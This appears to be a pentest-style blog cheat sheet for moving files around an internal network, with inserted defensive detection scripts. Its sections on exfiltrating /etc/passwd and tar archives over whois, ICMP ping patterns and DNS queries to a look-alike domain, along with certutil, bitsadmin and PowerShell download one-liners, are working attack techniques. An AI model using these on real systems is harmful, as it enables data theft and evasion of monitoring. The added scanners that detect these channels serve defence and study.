Transferring and downloading files on an internal network

wput

wput dir_name ftp://linuxpig:123456@host.com/

wget

wget http://site.com/1.rar -O 1.rar

aria2c (needs to be installed)

aria2c -o owncloud.zip https://download.owncloud.org/community/owncloud-9.0.0.tar.bz2

powershell

$p = New-Object System.Net.WebClient; $p.DownloadFile("http://domain/file", "C:%homepath%file")
# %homepath% is cmd.exe syntax and is not expanded by PowerShell; use "$env:HOMEPATH" there

VBS script

Set args = Wscript.Arguments
Url = "http://domain/file"
Dim xHttp: Set xHttp = CreateObject("Microsoft.XMLHTTP")
Dim bStrm: Set bStrm = CreateObject("Adodb.Stream")
xHttp.Open "GET", Url, False
xHttp.Send
With bStrm
    .Type = 1 ' adTypeBinary
    .Open
    .Write xHttp.responseBody
    ' %homepath% is not expanded inside a VBS string literal; expand it with
    ' CreateObject("WScript.Shell").ExpandEnvironmentStrings("%HOMEPATH%") if needed
    .SaveToFile "C:%homepath%\file", 2 ' adSaveCreateOverWrite
End With
Run: cscript test.vbs

Perl

#!/usr/bin/perl
use LWP::Simple;
getstore("http://domain/file", "file");
Run: perl test.pl

Python

#!/usr/bin/python
# Python 2 (urllib2); on Python 3 use urllib.request.urlopen instead
import urllib2
u = urllib2.urlopen('http://domain/file')
localFile = open('local_file', 'wb')  # binary mode so downloaded bytes are not altered
localFile.write(u.read())
localFile.close()
Run: python test.py

Ruby

#!/usr/bin/ruby
require 'net/http'
Net::HTTP.start("www.domain.com") { |http|
  r = http.get("/file")
  open("save_location", "wb") { |file|
    file.write(r.body)
  }
}
Run: ruby test.rb

PHP

Run: php test.php

NC

attacker:

cat file | nc -l 1234

target:

nc host_ip 1234 > file

FTP

ftp 127.0.0.1
username
password
get file
exit

TFTP

tftp -i host GET location_of_file_on_tftp_server C:%homepath%file
(Windows tftp syntax is tftp [-i] host GET source destination: the remote file comes first, the local destination second.)

Bitsadmin

bitsadmin /transfer n http://domain/file c:%homepath%file

Windows file share

net use x: \\127.0.0.1\share /user:example.com\userID myPassword

SCP

local to remote:

scp file user@host.com:/tmp

remote to local:

scp user@host.com:/tmp/file file

rsync

copy files from a remote rsync server to the local machine:

rsync -av root@192.168.78.192::www /databack

copy files from the local machine to a remote rsync server:

rsync -av /databack root@192.168.78.192::www

certutil.exe

certutil.exe -urlcache -split -f http://site.com/file
copy

copy \\IP\ShareName\file.exe file.exe
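As an added example that is not part of the original post, the following Python scanner flags the Windows download and copy primitives listed above (certutil -urlcache, bitsadmin /transfer, WebClient.DownloadFile, tftp -i GET, copy from a UNC share) when they appear in process-creation command lines. The log records and their user|image|command-line layout are constructed for the demo and do not follow any real product's format.

```python
"""Flag process command lines that use the Windows download / copy primitives
listed above. Added example, not part of the original post; the log records and
their 'user|image|command line' layout are constructed for the demo."""
import re

# One rule per primitive from the cheat sheet; regexes run on the lower-cased command line.
RULES = [
    ("certutil_urlcache", re.compile(r"certutil(\.exe)?\s+.*-urlcache\b.*\bhttps?://")),
    ("bitsadmin_transfer", re.compile(r"bitsadmin(\.exe)?\s+/transfer\b")),
    ("powershell_webclient", re.compile(r"powershell.*(net\.webclient|downloadfile|downloadstring)")),
    ("tftp_get", re.compile(r"\btftp(\.exe)?\s+-i\s+\S+\s+get\b")),
    # "copy \\host\share\..." : two backslashes, a host name, then a backslash
    ("copy_from_unc", re.compile(r"\b(copy|xcopy|robocopy)\s+\\\\[^\\]+\\")),
]


def classify(cmdline):
    """Return the names of every rule the command line matches (empty list = no hit)."""
    lowered = cmdline.lower()
    return [name for name, rx in RULES if rx.search(lowered)]


def scan(records):
    """Walk constructed 'user|image|cmdline' records; return (user, image, hits) for each match."""
    findings = []
    for record in records:
        user, image, cmdline = record.split("|", 2)
        hits = classify(cmdline)
        if hits:
            findings.append((user, image, hits))
    return findings


# Constructed sample records: the first five each use one primitive, the last two are benign look-alikes.
SAMPLE_LOG = [
    r"CORP\alice|C:\Windows\System32\certutil.exe|certutil.exe -urlcache -split -f http://site.com/file",
    r"CORP\bob|C:\Windows\System32\cmd.exe|copy \\10.0.0.5\share\file.exe file.exe",
    r"CORP\carol|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|powershell -c $p = New-Object System.Net.WebClient; $p.DownloadFile('http://domain/file','C:\Users\carol\file')",
    r"CORP\dave|C:\Windows\System32\bitsadmin.exe|bitsadmin /transfer n http://domain/file c:\Users\dave\file",
    r"CORP\erin|C:\Windows\System32\tftp.exe|tftp -i 10.0.0.5 GET tool.exe C:\Users\erin\tool.exe",
    r"CORP\frank|C:\Windows\System32\certutil.exe|certutil -hashfile setup.exe SHA256",
    r"CORP\grace|C:\Windows\System32\cmd.exe|copy C:\Users\grace\report.docx D:\backup\report.docx",
]

if __name__ == "__main__":
    for user, image, hits in scan(SAMPLE_LOG):
        print(f"{user:12} {image.split(chr(92))[-1]:16} {', '.join(hits)}")
```

The benign records show the intended precision: certutil with -hashfile and a copy between local drives produce no hit. In a real environment the copy-from-UNC rule fires on ordinary admin scripts as well, so it is best paired with an allowlist of known file servers or used as a low-severity signal that is correlated with the others.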
WHOIS

receiver (Host B):

nc -vlnp 1337 | sed "s/ //g" | base64 -d

sender (Host A):

whois -h host_ip -p 1337 "$(cat /etc/passwd | base64)"
WHOIS + TAR

First:

ncat -k -l -p 4444 | tee files.b64 # tee to a file so you can make sure you have it

Next:

tar czf - /tmp/* | base64 | xargs -I bits timeout 0.03 whois -h host_ip -p 4444 bits

Finally:

cat files.b64 | tr -d '\r\n' | base64 -d | tar zxvf - # to get the files out
PING

sender:

xxd -p -c 4 secret.txt | while read line; do ping -c 1 -p $line ip; done

receiver (ping_receiver.py):

import sys

try:
    from scapy.all import *
except ImportError:
    print("Scapy not found, please install scapy: pip install scapy")
    sys.exit(0)

def process_packet(pkt):
    # ping -p repeats the 4-byte pattern across the payload, so the last 4 bytes are one chunk
    if pkt.haslayer(ICMP) and pkt[ICMP].type == 8:  # echo request
        data = pkt[ICMP].load[-4:]
        print(data.decode("utf-8"), flush=True, end="")

sniff(iface="eth0", prn=process_packet)

Run: python3 ping_receiver.py
DIG

sender:

xxd -p -c 31 /etc/passwd | while read line; do dig @172.16.1.100 +short +tries=1 +time=1 $line.gooogle.com; done

receiver (dns_receiver.py):

import sys

try:
    from scapy.all import *
except ImportError:
    print("Scapy not found, please install scapy: pip install scapy")
    sys.exit(0)

def process_packet(pkt):
    if pkt.haslayer(DNS) and pkt.haslayer(DNSQR):
        domain = pkt[DNS][DNSQR].qname.decode('utf-8')  # e.g. "<hex chunk>.gooogle.com."
        root_domain = domain.split('.')[1]
        if root_domain.startswith('gooogle'):
            # strip the 13-character ".gooogle.com." suffix, then hex-decode the chunk
            print(bytearray.fromhex(domain[:-13]).decode("utf-8"), flush=True, end='')

sniff(iface="eth0", prn=process_packet)

Run: python3 dns_receiver.py
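As an added example that is not part of the original post, here are defender-side checks for the two covert channels above: DNS queries whose leftmost label is a long hex string (the dig sender emits 31 bytes per query, i.e. a 62-character label), a count of distinct labels per parent domain (a chunked transfer produces many unique names under one parent), and ICMP echo payloads that do not match a normal ping pattern (ping -p fills the payload with a repeated user pattern). The passwd-like text, query names and ICMP payloads are constructed for the demo; the assumed default payload shapes of iputils and Windows ping are stated in the comments and are assumptions, not something the original post documents.

```python
"""Defender-side heuristics for the ICMP and DNS channels shown above.
Added example, not code from the original post; every sample below is constructed."""
import string

HEXDIGITS = set(string.hexdigits)


def is_hex_label(label):
    """A label made only of hex digits with even length, i.e. hex-encoded raw bytes."""
    return len(label) >= 2 and len(label) % 2 == 0 and all(c in HEXDIGITS for c in label)


def suspicious_dns_query(qname, min_hex_len=32):
    """Flag a query whose leftmost label is a long hex string; normal hostnames are
    short and rarely pure hex, while the dig sender above produces 62-character labels."""
    labels = qname.rstrip(".").split(".")
    return len(labels) >= 3 and len(labels[0]) >= min_hex_len and is_hex_label(labels[0])


def noisy_parent_domains(qnames, threshold=20):
    """Count distinct leftmost labels under each parent (last two labels) and return the
    parents at or above the threshold; a chunked transfer shows up as one busy parent."""
    per_parent = {}
    for qname in qnames:
        labels = qname.rstrip(".").split(".")
        if len(labels) < 3:
            continue
        parent = ".".join(labels[-2:])
        per_parent.setdefault(parent, set()).add(labels[0])
    return {p: len(s) for p, s in per_parent.items() if len(s) >= threshold}


WINDOWS_PING_PAYLOAD = b"abcdefghijklmnopqrstuvwabcdefghi"  # assumption: Windows ping default


def looks_like_standard_ping(payload):
    """Assumption: iputils ping fills the payload with bytes 0x00, 0x01, ... and overwrites
    the first 8 or 16 bytes with a timestamp; Windows ping sends a fixed 32-byte alphabet.
    A 'ping -p' pattern like the sender above uses matches neither shape."""
    if payload == WINDOWS_PING_PAYLOAD:
        return True
    for ts_len in (8, 16):
        tail = payload[ts_len:]
        if len(tail) >= 8 and all(tail[i] == (ts_len + i) & 0xFF for i in range(len(tail))):
            return True
    return False


def dns_findings(qnames):
    """Queries flagged by the hex-label rule."""
    return [q for q in qnames if suspicious_dns_query(q)]


# --- constructed samples ---------------------------------------------------
def hex_chunks(data, width=31):
    """Mirror 'xxd -p -c 31': hex-encode the data in fixed-size byte chunks."""
    return [data[i:i + width].hex() for i in range(0, len(data), width)]


FAKE_PASSWD = "\n".join(
    f"user{i}:x:{1000 + i}:{1000 + i}:User {i}:/home/user{i}:/bin/bash" for i in range(20)
).encode()
EXFIL_QUERIES = [chunk + ".gooogle.com." for chunk in hex_chunks(FAKE_PASSWD)]
BENIGN_QUERIES = ["www.example.com.", "mail.example.org.", "a1b2c3.cdn.example.net."]

LINUX_PING = b"\x00" * 16 + bytes(range(16, 56))   # 16-byte timestamp + 0x10..0x37 filler
EXFIL_PING = b"\x00" * 16 + b"secr" * 10            # 'ping -p 73656372' style repeated pattern

if __name__ == "__main__":
    print("flagged DNS queries:", len(dns_findings(EXFIL_QUERIES + BENIGN_QUERIES)))
    print("busy parent domains:", noisy_parent_domains(EXFIL_QUERIES + BENIGN_QUERIES))
    for name, payload in (("linux", LINUX_PING), ("windows", WINDOWS_PING_PAYLOAD), ("exfil", EXFIL_PING)):
        print(f"{name:8} standard ping: {looks_like_standard_ping(payload)}")
```

The last chunk of the constructed file is shorter than 31 bytes, so its label falls under the length threshold and only the per-parent count catches it; that is why the two DNS checks are meant to be used together. The ICMP check is deliberately strict about the default payload layout, so tune the accepted shapes to the ping implementations actually present on the network.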
...

Setting up an HTTP server

python2

python -m SimpleHTTPServer 1337

python3

python3 -m http.server 1337

PHP 5.4+

php -S 0.0.0.0:1337

ruby

ruby -rwebrick -e'WEBrick::HTTPServer.new(:Port => 1337, :DocumentRoot => Dir.pwd).start'
ruby -run -e httpd . -p 1337

Perl

perl -MHTTP::Server::Brick -e '$s=HTTP::Server::Brick->new(port=>1337); $s->mount("/"=>{path=>"."}); $s->start'
perl -MIO::All -e 'io(":8080")->fork->accept->(sub { $_[0] < io(-x $1 ? "./$1 |" : $1) if /^GET \/(.*) / })'

busybox httpd

busybox httpd -f -p 8000

posted @ 2021-08-04 12:34 Nones